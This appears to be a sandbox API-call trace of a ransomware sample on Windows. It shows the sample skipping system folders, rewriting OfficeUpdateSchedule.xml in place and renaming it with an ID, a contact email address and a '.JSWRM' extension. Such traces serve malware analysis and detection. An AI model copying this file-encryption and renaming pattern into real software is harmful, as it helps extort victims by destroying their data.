lstrcmpiW (lpString1="msvcp140.dll", lpString2=".") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="..") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="...") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="windows") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="recovery") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="perflogs") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="documents and settings") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="system volume information") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp140.dll", lpString2="msocache") returned 1 [0067.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.638] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c4400, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2=".") returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="..") returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="...") returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="windows") returned -1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="recovery") returned -1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="perflogs") returned -1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="documents and settings") returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="system volume information") returned -1 [0067.638] lstrcmpiW (lpString1="msvcr120.dll", lpString2="msocache") returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.638] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OfficeC2RClient.exe", cAlternateFileName="OFFICE~1.EXE")) returned 1 [0067.638] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2=".") returned 1 [0067.638] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="..") returned 1 [0067.638] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="...") returned 1 [0067.638] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="windows") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="recovery") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="perflogs") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="documents and settings") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="system volume information") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RClient.exe", lpString2="msocache") returned 1 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RClient.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RClient.exe", cchWideChar=19, lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeC2RClient.exe", lpUsedDefaultChar=0x0) returned 19 [0067.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RClient.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RClient.exe", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeC2RClient.exe", lpUsedDefaultChar=0x0) returned 19 [0067.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.639] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OfficeC2RCom.dll", cAlternateFileName="OFFICE~1.DLL")) returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2=".") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="..") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="...") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="windows") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="recovery") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="perflogs") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="documents and settings") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="system volume information") returned -1 [0067.639] lstrcmpiW (lpString1="OfficeC2RCom.dll", lpString2="msocache") returned 1 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RCom.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RCom.dll", cchWideChar=16, lpMultiByteStr=0x241218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeC2RCom.dll", lpUsedDefaultChar=0x0) returned 16 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RCom.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeC2RCom.dll", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeC2RCom.dll", lpUsedDefaultChar=0x0) returned 16 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.640] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd0d7e00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x2a5e58, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OfficeClickToRun.exe", cAlternateFileName="OFFICE~2.EXE")) returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2=".") returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="..") returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="...") returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="windows") returned -1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="recovery") returned -1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="perflogs") returned -1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="documents and settings") returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="system volume information") returned -1 [0067.640] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="msocache") returned 1 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x2413a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20 [0067.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.641] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f141b52, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x12ae, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OfficeUpdateSchedule.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2=".") returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="..") returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="...") returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="windows") returned -1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="recovery") returned -1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="perflogs") returned -1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="documents and settings") returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="$RECYCLE.BIN") returned 1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="system volume information") returned -1 [0067.641] lstrcmpiW (lpString1="OfficeUpdateSchedule.xml", lpString2="msocache") returned 1 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeUpdateSchedule.xml", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeUpdateSchedule.xml", cchWideChar=24, lpMultiByteStr=0x241038, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeUpdateSchedule.xml", lpUsedDefaultChar=0x0) returned 24 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeUpdateSchedule.xml", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeUpdateSchedule.xml", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeUpdateSchedule.xml", lpUsedDefaultChar=0x0) returned 24 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0067.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0067.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.642] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4782) returned 1 [0067.642] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12a0) returned 0x24d1d8 [0067.642] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x12a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x12a0, lpOverlapped=0x0) returned 1 [0067.644] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.644] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x12a0, lpOverlapped=0x0) returned 1 [0067.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.644] CloseHandle (hObject=0x454) returned 1 [0067.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0067.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0067.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0067.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0067.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0067.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0067.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.646] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.647] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fa7ec8f, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1162, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ServiceWatcherSchedule.xml", cAlternateFileName="SERVIC~1.XML")) returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2=".") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="..") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="...") returned 1 [0067.647] 